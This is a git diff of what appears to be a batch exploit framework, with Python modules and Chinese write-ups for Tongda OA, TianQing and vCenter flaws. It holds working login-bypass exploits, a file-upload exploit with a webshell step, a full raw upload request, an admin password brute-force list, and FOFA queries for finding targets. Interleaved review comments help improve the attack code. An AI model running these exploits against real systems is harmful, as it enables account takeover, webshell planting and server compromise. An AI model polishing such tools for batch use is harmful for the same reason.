boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB", + "Accept": "*/*", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5", + "Cookie": "PHPSESSID=000", + "Connection": "close" + } + if exp == None: + mem_string = poc_content() + target_tmp_file = [('ATTACHMENT', ('upload_poc.jpg', mem_string.read(), 'image/jpeg'))] + elif exp == "exp": + mem_string = exp_content() + target_tmp_file = [('ATTACHMENT', ('upload_exp.jpg', mem_string.read(), 'image/jpeg'))] + try: + res = requests.post(upload_url, headers=headers, files=target_tmp_file, verify=False, timeout=5) + except: + pass + res_content = res.text + if "用户未登陆" in res_content: + return None + elif "\\u4e0a\\u4f20\\u5931\\u8d25" in res_content: + return None + else: + target_tmp_path = re.findall('@(\d+)_', str(res_content))[0] + target_filename = re.findall('_(\d+)\|', str(res_content))[0] + target_path = "/general/../../attach/im/"+str(target_tmp_path)+"/"+str(target_filename)+".jpg" + return target_path + +def poc(target,exp=None): + target_path = verify_poc(target,exp) + if target_path: + result = {} + include_url1 = target + "/ispirit/interface/gateway.php" + include_url2 = target + "/mac/gateway.php" + # 格式化POST表单 + include_json_data = {"url":target_path} + include_data = json.dumps(include_json_data) + include_form_data = {"json":include_data} + # 请求poc验证 + target_res = requests.post(include_url1, data=include_form_data, verify=False, timeout=5) + result['vul_url'] = include_url1 + if target_res.status_code == 404: + target_res = requests.post(include_url2, data=include_form_data, verify=False, timeout=5) + result['vul_url'] = include_url2 + if exp == None: + if "this is a friendly test" in str(target_res.text): + include_json_data = json.dumps(include_json_data) + target_post_data = "json=" + include_json_data + result['vul_post_data'] = target_post_data + result['message'] = "存在任意文件上传漏洞" + result['poc'] = NAME + return result + else: + pass + 
elif exp == "exp": + exp_url = target+"general/eninde.php" + exp_res = requests.get(exp_url, verify=False, timeout=5) + if exp_res.status_code == 200: + print("webshell地址为: "+target+"general/index.php") + elif exp_res.status_code == 404: + print("webshell生成失败") + else: + print("已上传成功,但连接时可能被waf拦截") + +if __name__ == '__main__': + # poc调用 + poc("http://127.0.0.1/") + # exp单独调用方式。 exp调用请传参时附带第二个参数内容,参数内容为exp + # poc("http://127.0.0.1/", "exp") \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_Any_user_login.md b/Moudle/TDXK/TDXK_Any_user_login.md new file mode 100644 index 0000000..4af1e0e --- /dev/null +++ b/Moudle/TDXK/TDXK_Any_user_login.md @@ -0,0 +1,42 @@ +# 1、漏洞描述 + +通达OA部分版本存在任意用户登录漏洞,在未授权的情况下,通过一系列的请求操作,获取到合法的cookie,最终实现任意用户登录。 + +比任意在线用户登录漏洞更好一些,利用条件更低。 + +# 2、影响范围 + +通达OA < 11.5.200417版本 + 通达OA 2017版本 + +# 3、本地环境搭建 + +下载其中一个受影响的版本安装包,直接傻瓜式下一步自动安装。 + +# 4、漏洞利用 + +首先,访问http://ip:port/ispirit/login_code.php ,获取到codeuid + +![](images/11.png) + +其次,使用该codeuid作为post数据中的一部分,访问http://ip:port/general/login_code_scan.php ,返回status为1,则代表成功,否则返回status为0则代表失败,需要重复第一步获取新的codeuid,如果多次都是失败,则代表可能没有漏洞。 + +![](images/12.png) + +然后,同样使用该uid值作为传参,访问http://ip:port/ispirit/login_code_check.php?codeuid=【codeuid值】,与服务端交互,使得上一步客户端中使用的cookie合法。 + +![](images/14.png) + +如果是请求的时候没有带cookie,比如脚本请求,服务端会返回给客户端一个cookie。 + +![](images/15.png) + +最后,如果一直用的浏览器进行的操作,那么此时浏览器直接访问http://ip:port/general/index.php ,会发现已经成功登录上了admin账号,登录其他账号在第二步修改username的值。 + +或者在新的浏览器里,使用cookie编辑插件,通过第三步获取到的cookie值,访问http://ip:port/general/index.php ,直接登录。 + +![](images/16.png) + +# 5、exp + +既是poc,也是exp,通过框架调用,支持批量,只打印存在漏洞的URL,同时返回cookie,方便验证,返回网站title,初步了解网站归属。 \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_Any_user_login.py b/Moudle/TDXK/TDXK_Any_user_login.py new file mode 100644 index 0000000..3c3369e --- /dev/null +++ b/Moudle/TDXK/TDXK_Any_user_login.py 
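Review bot: In `verify_poc` the `requests.post` is wrapped in `try: ... except: pass`, but `res_content = res.text` follows unconditionally, so a timeout surfaces as `UnboundLocalError` on `res` instead of the `None` the caller tests for; change the handler to `except requests.RequestException: return None`. The two `re.findall(...)[0]` lookups can likewise raise `IndexError` on an unexpected body and should guard for an empty match. In `poc`'s exp branch the shell is probed at `target+"general/eninde.php"` but announced as `target+"general/index.php"` — one of the two names is wrong, and both lack the `/` separator, while `poc("http://127.0.0.1/")` in `__main__` yields `//ispirit` for the other URLs; `target.rstrip("/") + "/general/..."` is the shape to use throughout.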
@@ -0,0 +1,75 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import re +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_Any user login' +AUTHOR="境心" +REMARK='TDXK_任意用户登录' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc(target): + result = {} + # 第一步 + login_code_url = target+"/ispirit/login_code.php" + login_code_headers = { + "User-Agent" : ua + } + login_code_res = requests.get(login_code_url,headers=login_code_headers, verify=False,timeout=5) + login_code_res = eval(login_code_res.text) + try: + codeuid = login_code_res['codeuid'] + except: + pass + else: + # 第二步 + login_code_scan_url = target+"/general/login_code_scan.php" + login_code_scan_headers = { + "User-Agent" : ua + } + login_code_scan_data = { + "uid" : "1", + "codeuid" : codeuid, + "type" : "confirm", + "source" : "pc", + "username" : "admin" + } + # 第三步 + login_code_scan_res = requests.post(login_code_scan_url,data=login_code_scan_data,headers=login_code_scan_headers, verify=False,timeout=5) + if "1" in login_code_scan_res.text: + login_code_check_url = target+"/ispirit/login_code_check.php?codeuid="+codeuid + login_code_check_headers = { + "User-Agent" : ua + } + login_code_check_res = requests.get(login_code_check_url,headers=login_code_check_headers, verify=False,timeout=5) + if "confirm" in login_code_check_res.text: + login_cookie = login_code_check_res.headers['Set-Cookie'] + # 第四步 + target_url = target+"/general/index.php" + headers = { + "User-Agent": ua, + "Cookie" : login_cookie + } + target_res = requests.get(target_url,headers=headers,verify=False,timeout=5) + try: + title = re.findall('(.*)', str(target_res.text))[0] + except: + title = "" + result['vul_url'] = target_url + 
result['cookie'] = login_cookie + result['title'] = title + result['message'] = "存在任意用户登录漏洞" + return result + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_logined_any_file_upload.md b/Moudle/TDXK/TDXK_logined_any_file_upload.md new file mode 100644 index 0000000..5f477dc --- /dev/null +++ b/Moudle/TDXK/TDXK_logined_any_file_upload.md 
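Review bot: `login_code_res = eval(login_code_res.text)` evaluates the body returned by the remote OA server as Python, so a target (or anyone in the path, since `verify=False`) can execute arbitrary code on the scanner host; parse it instead with `login_code_res = login_code_res.json()` (or `json.loads(login_code_res.text)` with `import json`), keeping the `ValueError`/`KeyError` inside the existing try. `if "1" in login_code_scan_res.text` matches any body containing the digit 1, including a failure response whose message or timestamp has one; the accompanying .md says `status` is 1 on success, so test `login_code_scan_res.json().get("status") == 1`. `login_code_check_res.headers['Set-Cookie']` raises `KeyError` when no cookie is set, and the title regex `'(.*)'` as shown has no tag anchors (possibly lost in extraction) — worth confirming it is `<title>(.*)</title>`.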
@@ -0,0 +1,85 @@ +# 1、漏洞描述 + +通达OA部分版本在成功登录系统后,存在任意文件上传漏洞,配合手动设置的上传文件保存路径,可直接getshell。 + +# 2、影响范围 + +V11.2 + +V11.3 + +# 3、漏洞复现 + + + +登陆后,选择菜单-->系统管理员-->附件管理; + +然后配置文件保存路径,若真实环境中已经保存了上传路径,并且上传路径为webroot目录之下的任何一个子目录,则可不用修改,直接用即可。 + +![](images/21.png) + +文件上传位置在,组织-->系统管理员-->上传附件,默认文件上传位置C:\MYOA\attach\im\2108,因为不在web目录下边,所以不能通过web直接访问,可借助文件包含试试; + +![](images/22.png) + +上传文件时抓包,同时利用Windows文件命名特性,后缀加.绕过文件上传黑名单, + +![](images/23.png) + +上传后的目录则在设置的主目录下的im/上传返回的一串数字/文件名,这个2108为im目录的子目录,下划线后边的这串数字则为文件名的一部分,整个文件名在这里是1664170897.21.php,命名规则为返回的这串数字+.+上传的文件名; + +![](images/24.png) + +POST包: + +```python +POST /module/upload/upload.php?module=im HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------405175731128638857693749932995 +Content-Length: 948 +Origin: http://127.0.0.1 +DNT: 1 +Connection: close +Referer: http://127.0.0.1/general/index.php?isIE=0&modify_pwd=0 +Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=5197c48a; PHPSESSID=v0vakndetps2s3o506alv3fhc5 + +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="id" + +WU_FILE_0 +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="name" + +21.php +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="type" + +application/octet-stream +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="lastModifiedDate" + +2021/8/30 上午10:41:07 +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="size" + +31 +-----------------------------405175731128638857693749932995 +Content-Disposition: form-data; name="file"; filename="21.php." 
+Content-Type: application/octet-stream + + +-----------------------------405175731128638857693749932995-- + +``` + +# 4、poc + +poc这里只验证是否能上传上去,没有考虑上传后的目录问题,不过只要能上传上去,上传后的目录也就能知道,上边也有写。 + +poc这里调用了通达OA的另外两个漏洞,任意在线用户登录、任意用户登录,为了方便能够在只知道url的情况下,直接验证,配合框架,可以批量。 \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_logined_any_file_upload.py b/Moudle/TDXK/TDXK_logined_any_file_upload.py new file mode 100644 index 0000000..338ab10 --- /dev/null +++ b/Moudle/TDXK/TDXK_logined_any_file_upload.py 
@@ -0,0 +1,114 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import re +import requests.packages.urllib3 +import io +from Config.config_requests import ua +from Moudle.TDXK.TDXK_Any_user_login import poc as poc1 +from Moudle.TDXK.TDXK_online_user_login import poc as poc2 +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_logined any file upload' +AUTHOR="境心" +REMARK='TDXK_登录后任意文件上传' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc_content(): + content = """-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="id" + +WU_FILE_0 +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="name" + +test.php +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="type" + +application/octet-stream +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="lastModifiedDate" + +2021/8/25 下午2:58:14 +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="size" + +31 +-----------------------------340010984629733334144172362322 +Content-Disposition: form-data; name="file"; filename="test.php." 
+Content-Type: application/octet-stream + + +-----------------------------340010984629733334144172362322--""" + mem_string = io.StringIO() + mem_string.write(content) + mem_string.seek(0) + return mem_string + +def get_cookie(target): + result1 = poc1(target) + if result1['cookie']: + cookie = result1['cookie'] + else: + result2 = poc2(target) + if result2['cookie']: + cookie = result2['cookie'] + return cookie + + +def poc(target,cookie=None): + result = {} + mem_string = poc_content() + upload_url = target+"/module/upload/upload.php?module=im" + target_tmp_file = [('file', ('test.php', mem_string.read(), 'image/jpeg'))] + if cookie != None: + cookie = cookie + headers = { + "User-Agent": ua, + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------340010984629733334144172362322", + "Cookie": cookie, + "Connection": "close" + } + target_res = requests.post(upload_url, headers=headers, files=target_tmp_file, verify=False, timeout=5) + res_text = target_res.text + if "test.php" in res_text and "SUCCESS" in res_text: + target_tmp_path = re.findall('@(\d+)_', str(res_text))[0] + target_tmp_filename = re.findall('@\d+_(\d+)', str(res_text))[0] + target_filename = target_tmp_filename + '.test.php' + print("文件位置: 未知上层目录/im/" + target_tmp_path + "/"+target_filename) + elif cookie == None: + cookie = get_cookie(target) + headers = { + "User-Agent": ua, + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------340010984629733334144172362322", + "Cookie": cookie, + "Connection": "close" + } + target_res = requests.post(upload_url, headers=headers, files=target_tmp_file, verify=False, timeout=5) + res_text = target_res.text + if "test.php" in res_text and "SUCCESS" in res_text: + target_tmp_path = re.findall('@(\d+)_', str(res_text))[0] + target_tmp_filename = re.findall('@\d+_(\d+)', str(res_text))[0] + target_filename = target_tmp_filename+'.test.php' + 
result['文件位置'] = "未知上层目录/im/"+target_tmp_path+"/"+target_filename + result['poc'] = NAME + result['message'] = '存在登录后任意文件上传漏洞' + return result + +if __name__ == '__main__': + # 结合任意登录漏洞盲测 + poc("http://127.0.0.1") + # 盲测无结果,但能获取到账号的情况下,精准测试 + # poc("http://127.0.0.1","PHPSESSID=tbd8hi89eqtbeadt29rmort167; path=/") \ No newline at end of file diff --git a/Moudle/TDXK/TDXK_online_user_login.md b/Moudle/TDXK/TDXK_online_user_login.md new file mode 100644 index 0000000..5bad6f1 --- /dev/null +++ b/Moudle/TDXK/TDXK_online_user_login.md @@ -0,0 +1,49 @@ +# 1、写在前方 +漏洞利用虽然不复杂,但是因为条件限制,有点看脸的赶脚,fofa上第二页才找到一个可利用的,所以吧。。。 +# 2、漏洞描述 +通达OA V11.7版本存在任意在线用户登录漏洞,只需账号是已登录状态,其他访问者无需账号、密码即可登录该账号。 +使用fofa语句搜索该版本的通达OA + +``` +app="TDXK-通达OA" +``` + + + +# 3、漏洞验证 +## 3.1、漏洞URL +访问如下URL(重点是URI部分,尤其是uid),更改遍历uid的值(数字),即可实现任意在线用户登录。 + +``` +http://x.x.x.x:port/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 +``` + + + +## 3.2、漏洞验证 +页面返回为空白,则证明可利用 + +![](images/31.png) + +页面返回RELOGIN,则不能利用 + +![](images/32.jpg) + +若漏洞可利用,则我们已经获取到了登录的cookie + +![](images/33.jpg) + +# 4、漏洞利用 +此时我们将URL改为如下内容(其实改的URI部分),然后访问,发现就已经成功登录了。 + +``` +http://x.x.x.x:port/general/ +``` + +![](images/34.jpg) + + + +# 5、脚本 +这个漏洞poc与exp差不多,脚本会返回漏洞URL、可直接登录的cookie,与框架结合可批量。 + diff --git a/Moudle/TDXK/TDXK_online_user_login.py b/Moudle/TDXK/TDXK_online_user_login.py new file mode 100644 index 0000000..26c3e23 --- /dev/null +++ b/Moudle/TDXK/TDXK_online_user_login.py 
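Review bot: In `poc`, the branch that runs when a cookie is supplied only prints the upload location and never fills `result`, so a confirmed upload with a known session is reported to the framework as `{}`, while the fallback branch is the only one that sets `result['poc']`/`result['message']`. `get_cookie` compounds this: it indexes `result1['cookie']` on dicts that are empty when the login bypasses find nothing (the online-login module visibly returns `{}` on `RELOGIN`), and leaves `cookie` unbound when both fail, so a non-vulnerable host raises instead of returning. The two near-identical header/POST/regex blocks should collapse into one `_upload()` helper, the regexes should be raw strings (`'@(\d+)_'` is an invalid-escape warning on 3.12+), and `re.findall(...)[0]` should be guarded since a `SUCCESS` body without the `@digits_digits` token currently raises `IndexError`. The hand-set `Content-Type` boundary must stay equal to the one embedded in `poc_content()`; that coupling deserves a comment, since the body requests builds uses a different outer boundary and the trick presumably relies on the server parsing with the header's boundary — confirm against a live target.
```python
def get_cookie(target):
    """Try the two login bypasses in turn; return a cookie string or None."""
    for login_poc in (poc1, poc2):
        found = login_poc(target) or {}
        if found.get('cookie'):
            return found['cookie']
    return None


def _upload(upload_url, cookie, target_tmp_file):
    """POST the crafted body once; return the result dict, or None on a miss."""
    headers = {
        "User-Agent": ua,
        "Accept-Encoding": "gzip, deflate",
        # Must match the boundary hard-coded in poc_content(); the server is
        # expected to parse with this boundary, not the one requests generates.
        "Content-Type": "multipart/form-data; boundary=---------------------------340010984629733334144172362322",
        "Cookie": cookie,
        "Connection": "close"
    }
    res_text = requests.post(upload_url, headers=headers, files=target_tmp_file,
                             verify=False, timeout=5).text
    match = re.search(r'@(\d+)_(\d+)', res_text)
    if "test.php" not in res_text or "SUCCESS" not in res_text or match is None:
        return None
    target_filename = match.group(2) + '.test.php'
    return {
        '文件位置': "未知上层目录/im/" + match.group(1) + "/" + target_filename,
        'poc': NAME,
        'message': '存在登录后任意文件上传漏洞',
    }


def poc(target, cookie=None):
    upload_url = target + "/module/upload/upload.php?module=im"
    target_tmp_file = [('file', ('test.php', poc_content().read(), 'image/jpeg'))]
    result = _upload(upload_url, cookie, target_tmp_file)
    if result is None and cookie is None:
        cookie = get_cookie(target)
        if cookie:
            result = _upload(upload_url, cookie, target_tmp_file)
    return result if result is not None else {}
```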
@@ -0,0 +1,37 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_online user login' +AUTHOR="境心" +REMARK='TDXK_任意在线用户登录' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc(target): + result = {} + vul_url = target+"/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0" + + res = requests.get(vul_url, headers=headers, verify=False,timeout=5) + if res.status_code == 200 and res.text == "RELOGIN": + pass + elif res.status_code == 200 and res.text == "": + res_headers = res.headers + cookie = res_headers['Set-Cookie'] + result['vul_url'] = vul_url + result['cookie'] = cookie + result['poc'] = NAME + result['message'] = "存在任意在线用户登录漏洞" + return result + +if __name__ == '__main__': + poc("http://127.0.0.1:8088/") diff --git a/Moudle/TDXK/TDXK_weakpwd.py b/Moudle/TDXK/TDXK_weakpwd.py new file mode 100644 index 0000000..495ead9 --- /dev/null +++ b/Moudle/TDXK/TDXK_weakpwd.py 
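Review bot: In `poc`, `res_headers['Set-Cookie']` raises `KeyError` whenever the server answers 200 with an empty body but no `Set-Cookie` header (a blank WAF page or a stripped response), because `res.text == ""` alone does not prove a session was issued; use `cookie = res.headers.get('Set-Cookie')` and only populate `result` when it is truthy. The `requests.get` call also lets `ConnectionError`/`Timeout` propagate to the batch caller, whereas the TianQing modules in this same commit catch request failures — the modules should agree on one convention. The probe is fixed to `uid=1` while the accompanying write-up describes iterating uid values; exposing it as `def poc(target, uid=1)` would keep the default while letting the framework sweep, and a docstring should state that an empty dict means "not confirmed", since the upload module reads `result['cookie']` directly.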
@@ -0,0 +1,46 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import base64 +import requests +import requests.packages.urllib3 +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_weakpwd' +AUTHOR="nuoyan" +REMARK='TDXK_弱口令' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc(target): + result = {} + vul_url = target+"/logincheck.php" + + dic=['','123456','admin','123456789','1','123','111111'] + for i in dic: + postdata = { + 'UNAME': 'admin', + 'PASSWORD': base64.b64encode(i.encode()).decode(), + 'encode_type': '1', + } + + res = requests.post(vul_url, headers=headers,data=postdata, verify=False,timeout=10) + if 'goto_oa' in res.text: + result['target'] = target + result['poc'] = NAME + result['message'] = "存在admin弱口令:{}".format(i) + return result + pass + else: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1:8088/") + + diff --git a/Moudle/TDXK/images/1.png b/Moudle/TDXK/images/1.png new file mode 100644 index 0000000..d80720d Binary files /dev/null and b/Moudle/TDXK/images/1.png differ diff --git a/Moudle/TDXK/images/11.png b/Moudle/TDXK/images/11.png new file mode 100644 index 0000000..8329f2d Binary files /dev/null and b/Moudle/TDXK/images/11.png differ diff --git a/Moudle/TDXK/images/12.png b/Moudle/TDXK/images/12.png new file mode 100644 index 0000000..7417271 Binary files /dev/null and b/Moudle/TDXK/images/12.png differ diff --git a/Moudle/TDXK/images/13.png b/Moudle/TDXK/images/13.png new file mode 100644 index 0000000..92318e3 Binary files /dev/null and b/Moudle/TDXK/images/13.png differ diff --git a/Moudle/TDXK/images/14.png b/Moudle/TDXK/images/14.png new file mode 100644 index 0000000..7e0f9f7 Binary files /dev/null and b/Moudle/TDXK/images/14.png differ 
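Review bot: `poc` fires seven consecutive failed logins against the `admin` account with no note that this may trip a login-failure lockout if the target enforces one (I cannot tell from the module whether Tongda OA does); a header comment such as `# NOTE: 7 failed admin logins in a row — may lock the account on hardened targets` would let operators decide before batching. `vul_url = target+"/logincheck.php"` produces `//logincheck.php` for the trailing-slash target the `__main__` block itself uses, while the CVE_2021_22005 module in this commit normalizes the slash; `vul_url = target.rstrip('/') + "/logincheck.php"` fixes it. The `pass` after `return result` and the `else: pass` branch are dead code and should go, and the function should end with an explicit `return result` (or `None`) so callers do not depend on implicit fall-through.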
diff --git a/Moudle/TDXK/images/15.png b/Moudle/TDXK/images/15.png
new file mode 100644
index 0000000..ce759d6
Binary files /dev/null and b/Moudle/TDXK/images/15.png differ
diff --git a/Moudle/TDXK/images/16.png b/Moudle/TDXK/images/16.png
new file mode 100644
index 0000000..a9a3711
Binary files /dev/null and b/Moudle/TDXK/images/16.png differ
diff --git a/Moudle/TDXK/images/2.png b/Moudle/TDXK/images/2.png
new file mode 100644
index 0000000..fd818de
Binary files /dev/null and b/Moudle/TDXK/images/2.png differ
diff --git a/Moudle/TDXK/images/21.png b/Moudle/TDXK/images/21.png
new file mode 100644
index 0000000..b9d382e
Binary files /dev/null and b/Moudle/TDXK/images/21.png differ
diff --git a/Moudle/TDXK/images/22.png b/Moudle/TDXK/images/22.png
new file mode 100644
index 0000000..c603b7b
Binary files /dev/null and b/Moudle/TDXK/images/22.png differ
diff --git a/Moudle/TDXK/images/23.png b/Moudle/TDXK/images/23.png
new file mode 100644
index 0000000..dd1e24b
Binary files /dev/null and b/Moudle/TDXK/images/23.png differ
diff --git a/Moudle/TDXK/images/24.png b/Moudle/TDXK/images/24.png
new file mode 100644
index 0000000..3518a31
Binary files /dev/null and b/Moudle/TDXK/images/24.png differ
diff --git a/Moudle/TDXK/images/3.png b/Moudle/TDXK/images/3.png
new file mode 100644
index 0000000..1bbaea7
Binary files /dev/null and b/Moudle/TDXK/images/3.png differ
diff --git a/Moudle/TDXK/images/31.png b/Moudle/TDXK/images/31.png
new file mode 100644
index 0000000..aa98c58
Binary files /dev/null and b/Moudle/TDXK/images/31.png differ
diff --git a/Moudle/TDXK/images/32.jpg b/Moudle/TDXK/images/32.jpg
new file mode 100644
index 0000000..4e889cf
Binary files /dev/null and b/Moudle/TDXK/images/32.jpg differ
diff --git a/Moudle/TDXK/images/33.jpg b/Moudle/TDXK/images/33.jpg
new file mode 100644
index 0000000..fe354b3
Binary files /dev/null and b/Moudle/TDXK/images/33.jpg differ
diff --git a/Moudle/TDXK/images/34.jpg b/Moudle/TDXK/images/34.jpg new file mode 100644 index 0000000..fca0fc0 Binary files /dev/null and b/Moudle/TDXK/images/34.jpg differ diff --git a/Moudle/TDXK/images/4.png b/Moudle/TDXK/images/4.png new file mode 100644 index 0000000..2daa7e6 Binary files /dev/null and b/Moudle/TDXK/images/4.png differ diff --git a/Moudle/TDXK/images/5.png b/Moudle/TDXK/images/5.png new file mode 100644 index 0000000..b72b879 Binary files /dev/null and b/Moudle/TDXK/images/5.png differ diff --git a/Moudle/TDXK/images/6.png b/Moudle/TDXK/images/6.png new file mode 100644 index 0000000..fe3ac4b Binary files /dev/null and b/Moudle/TDXK/images/6.png differ diff --git a/Moudle/TDXK/images/7.png b/Moudle/TDXK/images/7.png new file mode 100644 index 0000000..0ca37b9 Binary files /dev/null and b/Moudle/TDXK/images/7.png differ diff --git a/Moudle/TianQing/TianQing_SQLinjection.py b/Moudle/TianQing/TianQing_SQLinjection.py new file mode 100644 index 0000000..8092fa1 --- /dev/null +++ b/Moudle/TianQing/TianQing_SQLinjection.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME='TianQing_SQLinjection' +AUTHOR="JDQ" +REMARK='天擎终端安全管理系统SQL注入' +FOFA_RULE='icon_hash="-829652342"' +###################################################### + +def poc(target): + result = {} + headers={ + "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" + } + + try: + r = requests.get(target+"/api/dp/rptsvcsyncpoint?ccid=1",headers=headers, verify=False,timeout=10) + if r.status_code==200 and 'result":0,"reason":"success' in r.text: + result['vurl'] = target + "/api/dp/rptsvcsyncpoint?ccid=1" + result['poc'] = NAME + return result + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file 
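Review bot: The bare `except: pass` around the request in `poc` swallows every exception, including `KeyboardInterrupt` and `SystemExit`, so a batch run cannot be interrupted cleanly and connection failures are indistinguishable from "not vulnerable"; narrow it to `except requests.RequestException: return None` (or log the error). The detection itself only confirms that `/api/dp/rptsvcsyncpoint?ccid=1` answers with the success JSON, which shows the endpoint is reachable unauthenticated but does not demonstrate that `ccid` is injectable — the `REMARK`/result message should say so, e.g. `# NOTE: reachability check only; injection per advisory must be confirmed manually`. The result key is `vurl` here but `vul_url` in the TDXK modules of the same commit; the framework consumer will want one name.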
diff --git a/Moudle/TianQing/TianQing_Unauthorized.py b/Moudle/TianQing/TianQing_Unauthorized.py new file mode 100644 index 0000000..b7af80a --- /dev/null +++ b/Moudle/TianQing/TianQing_Unauthorized.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME='TianQing_Unauthorized' +AUTHOR="JDQ" +REMARK='天擎终端安全管理系统未授权访问' +FOFA_RULE='icon_hash="-829652342"' +###################################################### + +def poc(target): + result = {} + headers={ + "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" + } + + try: + r = requests.get(target+"/api/dbstat/gettablessize",headers=headers, verify=False,timeout=10) + + if r.status_code==200 and 'result":0,"reason":"success' in r.text: + result['vurl'] = target + "/api/dbstat/gettablessize" + result['poc'] = NAME + return result + + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/VCenter/1.png b/Moudle/VCenter/1.png new file mode 100644 index 0000000..cd7a704 Binary files /dev/null and b/Moudle/VCenter/1.png differ diff --git a/Moudle/VCenter/CVE_2021_21972.md b/Moudle/VCenter/CVE_2021_21972.md new file mode 100644 index 0000000..32f2fd6 --- /dev/null +++ b/Moudle/VCenter/CVE_2021_21972.md 
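Review bot: Same defect as the sibling TianQing module: the bare `except: pass` in `poc` hides every failure, including `KeyboardInterrupt`, and turns timeouts into silent "not vulnerable" results; use `except requests.RequestException: return None`. The module is otherwise a copy of `TianQing_SQLinjection.py` differing only in the path, so a shared `_probe(target, path)` helper in the package would keep the two checks from drifting. A one-line docstring stating what a hit means — `"""Unauthenticated 200 with result:0 on /api/dbstat/gettablessize → table-size listing exposed."""` — would also make the `vurl` result self-explanatory to the framework user.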
@@ -0,0 +1,111 @@ +# 1、漏洞描述 + +vSphere Client(HTML5) 在 vCenter Server 插件中存在一个未授权的上传API接口。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,写入webshell,或向Linux系统的指定目录写入ssh 私钥,进而控制服务器。 + +fofa搜索方法见poc。 + +# 2、影响范围 + +vmware:vcenter_server 7.0 U1c 之前的 7.0 版本 + +vmware:vcenter_server 6.7 U3l 之前的 6.7 版本 + +vmware:vcenter_server 6.5 U3n 之前的 6.5 版本 + +# 3、漏洞分析 + +漏洞分析内容直接搬网上的,方便之后看漏洞部分代码 + +vCenter Server 的 vROPS 插件的 API 未经过鉴权,存在一些敏感接口。其中 uploadova 接口存在一个上传 OVA 文件的功能: + +```java +@RequestMapping( + value = {"/uploadova"}, + method = {RequestMethod.POST} + ) + public void uploadOvaFile(@RequestParam(value = "uploadFile",required = true) CommonsMultipartFile uploadFile, HttpServletResponse response) throws Exception { + logger.info("Entering uploadOvaFile api"); + int code = uploadFile.isEmpty() ? 400 : 200; + PrintWriter wr = null; +... + response.setStatus(code); + String returnStatus = "SUCCESS"; + if (!uploadFile.isEmpty()) { + try { + logger.info("Downloading OVA file has been started"); + logger.info("Size of the file received : " + uploadFile.getSize()); + InputStream inputStream = uploadFile.getInputStream(); + File dir = new File("/tmp/unicorn_ova_dir"); + if (!dir.exists()) { + dir.mkdirs(); + } else { + String[] entries = dir.list(); + String[] var9 = entries; + int var10 = entries.length; + + for(int var11 = 0; var11 < var10; ++var11) { + String entry = var9[var11]; + File currentFile = new File(dir.getPath(), entry); + currentFile.delete(); + } + + logger.info("Successfully cleaned : /tmp/unicorn_ova_dir"); + } + + 